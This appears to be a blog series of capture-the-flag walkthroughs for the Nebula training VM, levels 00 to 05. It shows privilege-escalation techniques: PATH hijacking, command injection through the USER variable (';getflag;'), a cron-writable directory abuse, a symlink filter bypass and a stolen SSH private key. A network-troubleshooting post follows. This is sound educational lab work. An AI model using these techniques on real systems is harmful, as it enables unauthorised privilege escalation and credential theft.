Nebula exploit exercises walkthrough – level05

Check the flag05 home directory. You are looking for weak directory permissions.

Let’s start looking in /home/flag05:

level05@nebula:/home/flag05$ ls -asl
total 9
0 drwxr-x--- 1 flag05 level05   80 2014-06-03 04:19 .
0 drwxr-xr-x 1 root   root     420 2012-08-27 07:18 ..
0 drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
4 -rw------- 1 flag05 flag05    13 2014-06-03 04:19 .bash_history
1 -rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 flag05 flag05    60 2014-06-03 04:17 .cache
1 -rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
0 drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh

Compare to the home directory of level05:

level05@nebula:/home/flag05$ ls -asl /home/level05
total 9
0 drwxr-x--- 1 level05 level05  100 2014-06-04 21:55 .
0 drwxr-xr-x 1 root    root     420 2012-08-27 07:18 ..
4 -rw------- 1 level05 level05  298 2014-06-03 04:19 .bash_history
1 -rw-r--r-- 1 level05 level05  220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 level05 level05 3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 level05 level05   60 2014-06-03 04:15 .cache
1 -rw-r--r-- 1 level05 level05  675 2011-05-18 02:54 .profile

So we have .ssh – the store of SSH keys for the user – and .backup. The .ssh directory is locked down so we can’t see it.

Let’s look in .backup:

level05@nebula:/home/flag05/.backup$ ls -asl
total 2
0 drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
0 drwxr-x--- 1 flag05 level05   80 2014-06-03 04:19 ..
2 -rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz

A single backup .tgz. Let’s copy it out to our own home directory and unpack.

level05@nebula:~$ cp /home/flag05/.backup/backup-19072011.tgz ./
level05@nebula:~$ tar zxvf backup-19072011.tgz 
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys

Those are the private (id_rsa) and public (id_rsa.pub) keys for flag05. They may well work on the local machine:

level05@nebula:~$ ssh flag05@localhost
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

Simple. That’s why you should keep your private key private!
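The weakness here is a readable archive that happens to contain a private key. As a rough illustration (my own sketch, not part of the exercise), Python's tarfile module can list an archive's members without extracting anything, so checking a backup for likely SSH private keys could look like this. The set of key file names is an assumption: a key can be stored under any name.

```python
import tarfile

# File names that commonly hold an OpenSSH private key (an assumption;
# keys can be saved under any name).
PRIVATE_KEY_NAMES = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519"}


def private_keys_in_archive(path):
    """List members of a (possibly compressed) tar archive that look like SSH private keys."""
    with tarfile.open(path, "r:*") as archive:  # "r:*" auto-detects gzip/bzip2/xz
        return [
            member.name
            for member in archive.getmembers()
            if member.isfile() and member.name.rsplit("/", 1)[-1] in PRIVATE_KEY_NAMES
        ]
```

Pointed at /home/flag05/.backup/backup-19072011.tgz, this should report .ssh/id_rsa, going by the tar listing above.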

Nebula exploit exercises walkthrough – level04

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
    printf("%s [file to read]\n", argv[0]);
    exit(EXIT_FAILURE);
  }

  if(strstr(argv[1], "token") != NULL) {
    printf("You may not access '%s'\n", argv[1]);
    exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
    err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));
  
  if(rc == -1) {
    err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

This program looks like it will read the file passed to it as the first argument (up to 1024 bytes of it) and write it to standard output. Let’s test that out:

level04@nebula:/home/flag04$ ./flag04 
./flag04 [file to read]
level04@nebula:/home/flag04$ ./flag04 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh

Everything as expected then. The problem is that it refuses any argument containing the string “token”, so we can’t simply pass it the path to the token file. How can we get round this?

Symbolic links to the rescue again!

level04@nebula:~$ ln -s /home/flag04/token Token
level04@nebula:~$ /home/flag04/flag04 /home/level04/Token
06508b5e-8909-4f38-b630-fdb148a848a2

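Just create a symbolic link whose name doesn’t contain “token”. The check uses strstr(), which is case-sensitive and only looks at the name we pass in, not at the file the link points to.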

So what is this long string? It seems sensible to try logging in to the flag04 account with it as the password:

flag04@nebula:~$ getflag
You have successfully executed getflag on a target account
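To see why the link works, here is a small Python sketch (the function names are hypothetical) contrasting a check on the name we are given, which is what flag04 does, with a check on the file the path actually resolves to. Both are illustrations only: even the resolved check is racy, because the link could be swapped between the check and the open().

```python
import os


def naive_allowed(path):
    # Mirrors flag04's check, strstr(argv[1], "token") == NULL:
    # only the string we were handed is inspected.
    return "token" not in path


def resolved_allowed(path):
    # Inspect the name of the file the path really points to, following
    # symlinks. Still a time-of-check/time-of-use race, not a real fix.
    return "token" not in os.path.basename(os.path.realpath(path))
```

With the link from above, naive_allowed("/home/level04/Token") is True while resolved_allowed on the same path is False. Refusing symlinks when opening, for example with os.O_NOFOLLOW, is a sturdier direction than any string comparison.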

Nebula exploit exercises walkthrough – level03

level03

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

cron is a utility used to run tasks periodically, found in nearly every distro.

In /home/flag03, we have a script – writable.sh – and a directory – writable.d.

level03@nebula:/home/flag03$ ls -sl
total 1
0 drwxrwxrwx 1 flag03 flag03 40 2014-06-03 03:39 writable.d
1 -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh

Let’s take a look at writable.sh:

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

This is fairly simple: for each file in the writable.d directory, run it with bash and then delete it. bash -x runs the script in trace mode, printing each command as it is executed, which gives you a bit more detail about what it is doing. I think we can ignore ulimit -t 5: it limits the subshell to 5 seconds of CPU time, possibly to stop a malicious script consuming excess resources.
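For illustration, a rough Python equivalent of writable.sh might look like the sketch below (the function names are my own). resource.setrlimit with RLIMIT_CPU stands in for ulimit -t 5, and subprocess.run stands in for bash -x "$i". One difference: if writable.d is empty, the shell loop runs once with the literal pattern and bash fails harmlessly, whereas this version simply does nothing.

```python
import glob
import os
import resource
import subprocess


def cap_cpu_time(seconds=5):
    # Like `ulimit -t 5`, which sets both the soft and hard limits:
    # the child may use at most `seconds` of CPU time before the kernel stops it.
    resource.setrlimit(resource.RLIMIT_CPU, (seconds, seconds))


def run_then_delete(directory):
    """Run every file in `directory` with `bash -x`, then delete it, like writable.sh."""
    # glob's "*" skips dotfiles, as the shell's does; sorted() approximates shell ordering
    for path in sorted(glob.glob(os.path.join(directory, "*"))):
        # The exit status is ignored, just as the shell loop ignores it
        subprocess.run(["bash", "-x", path], preexec_fn=cap_cpu_time)
        try:
            os.remove(path)  # rm -f "$i"
        except OSError:
            pass  # keep going with the next file, as the shell loop would
```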

Note that the writable.d directory is world read/write – so we can just put a script in there:

level03@nebula:~$ cat getflag.sh 
#!/bin/sh

/bin/getflag >> /tmp/flag03.out
level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/

Then wait a short while, assuming that the writable.sh script is the one being run by cron…

level03@nebula:/tmp$ ls -sl
total 4
4 -rw-rw-r-- 1 flag03 flag03 59 2014-06-04 09:39 flag03.out
level03@nebula:/tmp$ cat flag03.out 
You have successfully executed getflag on a target account

Aside

Now – this is all well and good, but if we weren’t told that the script was run by cron, what could we do?

There is an admin account in the Nebula VM (nebula, which can use sudo), and using that I can do:

nebula@nebula:/var/spool/cron$ sudo crontab -u flag03 -l
*/3 * * * * /home/flag03/writable.sh

But I can’t do that as level03:

level03@nebula:/tmp$ crontab -u flag03 -l
must be privileged to use -u

Also, I could use ps to catch the process running, but that presumes I already knew it was being run by cron.

So I’m not sure how I would go about finding cron jobs as an unprivileged user.

I’ve asked on the Unix Stack Exchange.
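One approach that might work (I haven't tried it on Nebula) is to poll /proc for new processes and watch for anything that appears every few minutes. This relies on other users' /proc/<pid>/cmdline being readable, which is the default unless /proc is mounted with the hidepid option, and it can miss very short-lived processes between polls. The function names are hypothetical.

```python
import os
import time


def list_processes():
    """Map pid -> command line for every process whose /proc entry we can read."""
    procs = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/cmdline", "rb") as f:
                raw = f.read()
        except OSError:
            continue  # the process exited, or its /proc entry isn't readable to us
        if raw:  # kernel threads have an empty cmdline
            procs[int(entry)] = raw.rstrip(b"\0").replace(b"\0", b" ").decode(errors="replace")
    return procs


def new_processes(before, after):
    """Processes present in `after` but not in `before`."""
    return {pid: cmd for pid, cmd in after.items() if pid not in before}


def watch(interval=0.1):
    """Print each new process as it appears. Runs until interrupted (Ctrl-C)."""
    seen = list_processes()
    while True:
        time.sleep(interval)
        current = list_processes()
        for pid, cmd in sorted(new_processes(seen, current).items()):
            print(pid, cmd, flush=True)
        seen = current
```

Running watch() as level03 and waiting a few minutes should, in principle, show /home/flag03/writable.sh being started by cron.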

Nebula exploit exercises walkthrough – level02

level02

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

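#define _GNU_SOURCE  /* for asprintf() and setresuid()/setresgid() */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>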

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  
  system(buffer);
}

Another executable that calls system(). This time the command run is built up using an environment variable, USER.

Running the executable gives the expected result:

level02@nebula:/home/flag02$ ls -asl 
total 13
0 drwxr-x--- 2 flag02 level02   80 2011-11-20 21:22 .
0 drwxr-xr-x 1 root   root     400 2012-08-27 07:18 ..
1 -rw-r--r-- 1 flag02 flag02   220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 flag02 flag02  3353 2011-05-18 02:54 .bashrc
8 -rwsr-x--- 1 flag02 level02 7438 2011-11-20 21:22 flag02
1 -rw-r--r-- 1 flag02 flag02   675 2011-05-18 02:54 .profile
level02@nebula:/home/flag02$ echo $USER
level02
level02@nebula:/home/flag02$ ./flag02 
about to call system("/bin/echo level02 is cool")
level02 is cool
level02@nebula:/home/flag02$ 

The executable is suid. Notice that although it calls setresgid()/setresuid() so that system() runs as the owner of the file, the USER environment variable is simply inherited from whoever ran it, so it still says level02.

It’s really easy to change environment variables though.

level02@nebula:/home/flag02$ export USER=";getflag;"
level02@nebula:/home/flag02$ echo $USER
;getflag;
level02@nebula:/home/flag02$ ./flag02 
about to call system("/bin/echo ;getflag; is cool")

You have successfully executed getflag on a target account
sh: is: command not found
level02@nebula:/home/flag02$ 

This is a good reason not to trust environment variables (or any other input the caller controls) when building a shell command.
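The underlying bug is that the value of USER is pasted into a string that a shell then parses. A minimal Python sketch (hypothetical function names; subprocess plays the role of system()) shows the difference between handing the shell a command string and passing the value as a separate argument, where no shell is involved to interpret the semicolons.

```python
import subprocess


def greet_unsafe(user):
    # Like flag02: the value is pasted into a command string that /bin/sh parses,
    # so ';' ends the echo and starts a new command.
    cmd = f"/bin/echo {user} is cool"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def greet_safe(user):
    # No shell: the value reaches echo as one argument, so ';' is just text.
    args = ["/bin/echo", user, "is", "cool"]
    return subprocess.run(args, capture_output=True, text=True).stdout
```

With the payload ;echo injected;, greet_unsafe runs a second command and prints injected on its own line, while greet_safe just prints the payload as text.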

Aside

I didn’t fully understand why setresgid()/setresuid() had to be called for system() to run as the file owner. I built the same executable from source to experiment, set the owner, group and permissions as needed, but it didn’t work!

I spent a fair amount of time trying to figure this out, and it wasn’t until I did:

level02@nebula:/home/flag02$ cat /etc/fstab
overlayfs / overlayfs rw 0 0
tmpfs /tmp tmpfs nosuid,nodev 0 0

that I realised what was wrong: I was running my copies out of /tmp/, which is mounted nosuid, so the suid bit is ignored for everything in it…
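A quick way to check for this before losing time to it: os.statvfs reports the mount flags of the filesystem holding a path, and the os.ST_NOSUID bit says whether setuid bits are ignored there. A small sketch (the function name is my own):

```python
import os


def on_nosuid_mount(path):
    """True if the filesystem holding `path` is mounted nosuid (setuid bits are ignored)."""
    return bool(os.statvfs(path).f_flag & os.ST_NOSUID)
```

Given the fstab above, on_nosuid_mount("/tmp") should return True on Nebula, while a directory on the root overlay should not.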

Nebula exploit exercises walkthrough – level01

level01

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

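#define _GNU_SOURCE  /* for setresuid()/setresgid() */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>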
 
int main(int argc, char **argv, char **envp)
{
	gid_t gid;
	uid_t uid;
	gid = getegid();
	uid = geteuid();

	setresgid(gid, gid, gid);
	setresuid(uid, uid, uid);

	system("/usr/bin/env echo and now what?");
}

The executable is located in the /home/flag01 directory. On running it, we get the expected output:

level01@nebula:/home/flag01$ ./flag01
and now what?

Importantly, if we check the permissions on the executable:

level01@nebula:/home/flag01$ ls -asl
total 13
0 drwxr-x--- 1 flag01 level01   40 2014-06-03 22:33 .
0 drwxr-xr-x 1 root   root     380 2012-08-27 07:18 ..
1 -rw-r--r-- 1 flag01 flag01   220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 flag01 flag01  3353 2011-05-18 02:54 .bashrc
8 -rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
1 -rw-r--r-- 1 flag01 flag01   675 2011-05-18 02:54 .profile

We can see that this file also has the suid bit set. The problem then is, how do we get this to run “getflag”?

The executable does nothing with command line parameters, so we can’t pass anything in there. It does, however, call echo to output the text. echo is a built-in command in bash (i.e. implemented by the shell itself rather than being a discrete executable like ping), so if the shell ran it directly we couldn’t override what it does.

However, notice that the system() call runs /usr/bin/env before echo. Where is this normally seen? At the start of scripts, where we define the interpreter with a shebang:

#!/usr/bin/env python

/usr/bin/env is used because the shebang line needs a full path to the interpreter. python could be installed anywhere, and it is awkward to edit scripts to use a different full path from system to system. /usr/bin/env searches PATH for the command passed to it and runs the first match.

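Because env is a program rather than a shell, it can’t use the shell’s built-in echo: it searches PATH for an executable called echo (normally /bin/echo). This means we can provide our own echo, put its directory at the front of PATH so that env finds it first, and run arbitrary commands.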
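The lookup env performs can be sketched in Python. This is a simplified model (GNU env actually hands the name to the C library's execvp, which tries each PATH directory in turn), and the which function here is my own; the standard library's shutil.which does a similar job.

```python
import os


def which(command, path=None):
    """Return the first executable named `command` on `path`, roughly as env finds it."""
    if path is None:
        path = os.environ.get("PATH", os.defpath)
    for directory in path.split(os.pathsep):
        # An empty PATH entry means the current directory
        candidate = os.path.join(directory or ".", command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None
```

With the symlink below in place, calling which("echo", "." + os.pathsep + os.environ["PATH"]) from level01's home directory would return ./echo rather than /bin/echo.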

The easiest way to provide our own echo that runs getflag is to just create a symbolic link.

level01@nebula:~$ ln -s /bin/getflag echo
level01@nebula:~$ ls -asl
total 5
0 drwxr-x--- 1 level01 level01   80 2014-06-03 22:41 .
0 drwxr-xr-x 1 root    root     380 2012-08-27 07:18 ..
1 -rw-r--r-- 1 level01 level01  220 2011-05-18 02:54 .bash_logout
4 -rw-r--r-- 1 level01 level01 3353 2011-05-18 02:54 .bashrc
0 drwx------ 2 level01 level01   60 2014-06-03 18:22 .cache
0 lrwxrwxrwx 1 level01 level01   12 2014-06-03 22:41 echo -> /bin/getflag
1 -rw-r--r-- 1 level01 level01  675 2011-05-18 02:54 .profile
level01@nebula:~$ export PATH=.:$PATH
level01@nebula:~$ /home/flag01/flag01 
You have successfully executed getflag on a target account

Again – relatively simple. Symbolic links are useful tools for bypassing name and location checks!

Nebula exploit exercises walkthrough – level00

I’ve felt for a long time that whilst I understand a lot of vulnerabilities and exploits, I don’t have enough knowledge to actually build exploits myself. Reading is all well and good, but doing is better, especially when it comes to development.

To make learning easier, there are several virtual machine images you can download which have a series of challenges, getting progressively harder. The one I chose to do is called Nebula from exploit-exercises.com – it was recommended on several forums.

Getting up and running is very easy – download the ISO and run it from any virtualisation software. I’m using Parallels on Mac OS X.

I’m going to go through each level one by one!

level00

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.

Alternatively, look at the find man page.

I always prefer the lazy, more reliable method, i.e. using find.

We need to find an executable that is owned by flag00 and has the suid bit set. If suid is set, the executable will run as the owner of the file, rather than the person running it.

The command here is simple:

level00@nebula:~$ find / -perm /u=s -user flag00 2>/dev/null
/bin/.../flag00
/rofs/bin/.../flag00

The directory name “...” has been used to try to hide the file.

level00@nebula:~$ ls -asl /bin/.../
total 8
0 drwxr-xr-x 2 root   root      29 2011-11-20 21:22 .
0 drwxr-xr-x 3 root   root    2728 2012-08-18 02:50 ..
8 -rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 flag00

As you can see, this is owned by flag00, and instead of just being executable (-rwxr-x---) it is suid (-rwsr-x---): the s in the owner’s execute position is the setuid bit.
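For comparison, the test that find is doing can be sketched in Python with os.walk and os.lstat: a regular file whose mode has the stat.S_ISUID bit set and whose owner matches. This is an illustrative sketch, not a replacement for find; like find, it does not follow symlinked directories, and walking / includes /proc, so expect it to be slow.

```python
import os
import stat


def find_suid(root, uid):
    """Yield regular files under `root` with the setuid bit set and owned by `uid`
    (roughly `find root -perm /u=s -user <owner>`)."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable, like find's errors sent to /dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == uid:
                yield path
```

For this level, something like find_suid("/", pwd.getpwnam("flag00").pw_uid) should turn up /bin/.../flag00, since os.walk treats ... as an ordinary directory name.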

Run this file and you end up in a flag00 shell:

level00@nebula:~$ /bin/.../flag00 
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

Investigating a tricky network problem with Python, Scapy and other network tools

We’ve had a fairly long-term issue at work with connectivity to one of our application servers. Every now and then you can’t log in or connect, and it has seemed fairly random. This finally annoyed me and a customer enough that I had to look into it.

The connection is made to the server on port 1494 – Citrix ICA. Initially we suspected that the .ica file downloaded and opened by the Citrix Receiver software was incorrect or corrupt, but inspection and testing of this showed that it was OK. It really did look like the connection was just being randomly rejected.

It seemed that a single customer and I were having far more frequent issues than other users. Of course, it could just be that my tolerance for whinging is lower than my colleagues’.

Note that nearly all of the below was done on OS X – syntax of some of these commands differs under Linux and Windows. I have changed the host IP for security reasons.

telnet

Most applications that listen on a TCP port will accept a telnet connection, even if they never send anything back. Telnet is almost raw TCP – it has some control and escape sequences layered on top, but it is very simple at a protocol level.

ICA responds when connecting by sending back “ICA” every 5s:

andrew@andrews-mbp:/$ telnet 212.120.12.189 1494
Trying 212.120.12.189...
Connected to 212.120.12.189.
Escape character is '^]'.
ICAICA^]
telnet> quit
Connection closed.

But every now and then I was getting nothing back:

andrew@andrews-mbp:/$ telnet 212.120.12.189 1494
Trying 212.120.12.189...
telnet: connect to address 212.120.12.189: Operation timed out
telnet: Unable to connect to remote host

Oddly, whenever the Citrix Receiver failed to launch, I wasn’t always having problems with telnet, and vice versa. This is good – we’ve replicated the issue with a very simple utility using raw TCP rather than having to look into the intricate details of Citrix and whatever protocol it uses.

tcpdump

So let’s fire up tcpdump to see what happens when the connection is working. tcpdump is a command-line packet analyser. It’s not as versatile or as easy to use as Wireshark, but it is quick to run. You can use tcpdump -w to write a .pcap file which can then be opened in Wireshark later – this is handy when you are working on systems with no GUI.

I filtered the tcpdump output to only show traffic where one of the two IPs was the server.

andrew@andrews-mbp:/$ sudo tcpdump -i en0 host 212.120.12.189
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on en0, link-type EN10MB (Ethernet), capture size 65535 bytes
23:16:40.027018 IP andrews-mbp.49425 > 212.120.12.189.ica: Flags [S], seq 2598665487, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027031986 ecr 0,sackOK,eol], length 0
23:16:40.080030 IP 212.120.12.189.ica > andrews-mbp.49425: Flags [S.], seq 3949093716, ack 2598665488, win 8192, options [mss 1400,nop,wscale 8,sackOK,TS val 188590479 ecr 1027031986], length 0
23:16:40.080173 IP andrews-mbp.49425 > 212.120.12.189.ica: Flags [.], ack 1, win 8241, options [nop,nop,TS val 1027032039 ecr 188590479], length 0
23:16:40.321664 IP 212.120.12.189.ica > andrews-mbp.49425: Flags [P.], seq 1:7, ack 1, win 260, options [nop,nop,TS val 188590504 ecr 1027032039], length 6
23:16:40.321739 IP andrews-mbp.49425 > 212.120.12.189.ica: Flags [.], ack 7, win 8240, options [nop,nop,TS val 1027032280 ecr 188590504], length 0
23:16:42.389928 IP andrews-mbp.49425 > 212.120.12.189.ica: Flags [F.], seq 1, ack 7, win 8240, options [nop,nop,TS val 1027034342 ecr 188590504], length 0
23:16:42.794413 IP andrews-mbp.49425 > 212.120.12.189.ica: Flags [F.], seq 1, ack 7, win 8240, options [nop,nop,TS val 1027034746 ecr 188590504], length 0
23:16:42.796361 IP 212.120.12.189.ica > andrews-mbp.49425: Flags [.], ack 2, win 260, options [nop,nop,TS val 188590739 ecr 1027034342], length 0
23:16:42.796430 IP andrews-mbp.49425 > 212.120.12.189.ica: Flags [.], ack 7, win 8240, options [nop,nop,TS val 1027034748 ecr 188590739], length 0
23:16:43.055123 IP 212.120.12.189.ica > andrews-mbp.49425: Flags [.], ack 2, win 260, options [nop,nop,TS val 188590777 ecr 1027034342], length 0
23:16:45.591455 IP 212.120.12.189.ica > andrews-mbp.49425: Flags [R.], seq 7, ack 2, win 0, length 0

This all looks fairly normal – my laptop sends a SYN to the server, which responds with a SYN-ACK, and then my laptop responds with an ACK. You can see this in the Flags field of the capture: [S], [S.] and [.] (tcpdump shows ACK as a dot). Everything then progresses normally until I close the connection.
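If you read a lot of tcpdump output, it helps to have the flag characters to hand. A small lookup sketch in Python; the mapping reflects how tcpdump prints TCP flags, and decode_flags is just a helper name of my own:

```python
# Characters tcpdump uses in its "Flags [...]" field for each TCP flag
TCPDUMP_FLAGS = {
    "S": "SYN", "F": "FIN", "R": "RST", "P": "PSH",
    "U": "URG", "E": "ECE", "W": "CWR", ".": "ACK",
}


def decode_flags(field):
    """Turn a tcpdump flags field such as '[S.]' into a list of TCP flag names."""
    letters = field.strip("[]")
    if letters == "none":  # tcpdump prints [none] when no flags are set
        return []
    return [TCPDUMP_FLAGS[ch] for ch in letters]
```

So the [R.] at the end of the working capture is a reset with ACK from the server.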

However, when the connection fails:

23:23:31.617966 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027442033 ecr 0,sackOK,eol], length 0
23:23:32.812081 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027443220 ecr 0,sackOK,eol], length 0
23:23:33.822268 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027444226 ecr 0,sackOK,eol], length 0
23:23:34.830281 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027445232 ecr 0,sackOK,eol], length 0
23:23:35.837841 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027446234 ecr 0,sackOK,eol], length 0
23:23:36.846448 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027447234 ecr 0,sackOK,eol], length 0
23:23:38.863758 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,nop,wscale 4,nop,nop,TS val 1027449238 ecr 0,sackOK,eol], length 0
23:23:42.913202 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,sackOK,eol], length 0
23:23:50.934613 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,sackOK,eol], length 0
23:24:07.023617 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,sackOK,eol], length 0
23:24:39.154686 IP andrews-mbp.49569 > 212.120.12.189.ica: Flags [S], seq 644234313, win 65535, options [mss 1460,sackOK,eol], length 0

I get nothing back at all – it’s just my laptop’s TCP stack retransmitting the SYN again and again, waiting longer each time. I was expecting at least part of the handshake to succeed, but this looked like the host just wasn’t responding at all. This might indicate a firewall or network issue rather than a problem with Citrix.
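The gaps between those SYNs are worth a look, because they show the retransmissions backing off exponentially, which is the operating system's TCP stack at work rather than anything telnet does itself. A short Python calculation using the timestamps copied from the capture above:

```python
from datetime import datetime

# Timestamps of the unanswered SYNs in the failing capture
SYN_TIMES = [
    "23:23:31.617966", "23:23:32.812081", "23:23:33.822268", "23:23:34.830281",
    "23:23:35.837841", "23:23:36.846448", "23:23:38.863758", "23:23:42.913202",
    "23:23:50.934613", "23:24:07.023617", "23:24:39.154686",
]


def gaps(timestamps):
    """Seconds between consecutive tcpdump timestamps (HH:MM:SS.ffffff, same day)."""
    parsed = [datetime.strptime(t, "%H:%M:%S.%f") for t in timestamps]
    return [(b - a).total_seconds() for a, b in zip(parsed, parsed[1:])]


print([round(g) for g in gaps(SYN_TIMES)])
# [1, 1, 1, 1, 1, 2, 4, 8, 16, 32]
```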

I used Wireshark on the server side to confirm that no traffic was getting through. I could see the successful connections progressing fine, but I could see nothing of the failing connections. I wanted to check both sides because there were a number of potential scenarios where a client could send a SYN and not get a SYN-ACK back:

  1. Client sends SYN, server never sees SYN.
  2. Client sends SYN, server sees SYN, server sends SYN-ACK back which is lost.
  3. Client sends SYN, server sees SYN, chooses not to respond.

It seemed that scenario 1 was happening here.

So what was causing this? Sometimes it worked, sometimes it didn’t. Did it depend on what time I did it? Was there another variable involved?

mtr

Let’s check for outright packet loss. ping and traceroute are useful for diagnosing packet loss on a path, but it can be hard to work out which hop is causing problems. Enter mtr, or My traceroute. It provides a tabular, continuously updating display that combines ping and traceroute with a lot of useful statistics.

                                      My traceroute  [v0.85]
andrews-mbp (0.0.0.0)                                                    Thu Dec  5 00:52:49 2013
Keys:  Help   Display mode   Restart statistics   Order of fields   quit
                                                         Packets               Pings
 Host                                                  Loss%   Snt   Last   Avg  Best  Wrst StDev
 1. router.asus.com                                     0.0%    36    1.8   4.6   1.2 104.0  17.0
 2. 10.182.43.1                                         0.0%    36   10.1  41.3   8.1 291.2  68.1
 3. haye-core-2a-ae6-642.network.virginmedia.net        0.0%    36    9.0  22.4   8.3 185.6  33.7
 4. brnt-bb-1c-ae9-0.network.virginmedia.net            0.0%    36   13.5  13.8   8.9  80.2  11.6
 5. brhm-bb-1c-et-700-0.network.virginmedia.net         0.0%    35   14.4  17.1  12.9  29.7   3.5
 6. brhm-core-2a-ae0-0.network.virginmedia.net          0.0%    35   17.3  16.0  13.0  23.5   2.3
 7. brhm-lam-2-tenge11.network.virginmedia.net          0.0%    35   14.5  15.3  12.5  21.1   2.0
 8. m949-mp4.cvx2-b.bir.dial.ntli.net                   0.0%    35   15.1  20.7  14.7 113.9  16.4
 9. 212.120.12.189                                      0.0%    35   20.5  19.7  16.3  34.0   2.9

I let this run for a while and observed virtually no packet loss. It’s important to note that mtr uses ICMP pings, not TCP as Citrix does, and routers and firewalls can treat ICMP differently from TCP. mtr does support TCP probes, but I can’t get that to work under OS X.

Python and telnetlib

So I wrote a small Python program using the telnetlib module to connect to the port periodically and show when there were problems. The output is a simple graphical representation so that I could spot any timing patterns.

import telnetlib  # deprecated since Python 3.11, removed in 3.13
import time

WAITTIME = 5                 # seconds between connection attempts
RHOST = '212.120.12.189'
RPORT = 1494                 # Citrix ICA
STATFREQ = 16                # print failures / total every 16 attempts

StatCounter = 0
FailCounter = 0

while True:
    time.sleep(WAITTIME)

    if StatCounter != 0 and StatCounter % STATFREQ == 0:
        print(str(FailCounter) + ' / ' + str(StatCounter))

    StatCounter += 1

    try:
        ica = telnetlib.Telnet(host=RHOST, port=RPORT, timeout=1)
    except OSError:          # covers socket.timeout as well as refused connections
        FailCounter += 1
        print('*', end=' ', flush=True)
    else:
        ica.close()
        print('.', end=' ', flush=True)

So this prints a . for a successful connection and a * for an unsuccessful one. After every 16 connection attempts, the number of failures / total attempts is printed.

. . . * . . * . . . . * . . * . 4 / 16
. . . * . * . . . . * . . * . . 8 / 32
. . * . . * . . . . * . * . . . 12 / 48
. . . * * . . . . . . * * . . . 16 / 64
. . . . * . . . . . . * * . . . 19 / 80
. . . * * . . . . . . * * . . . 23 / 96
. . . * * . . . . . . * . * . . 27 / 112
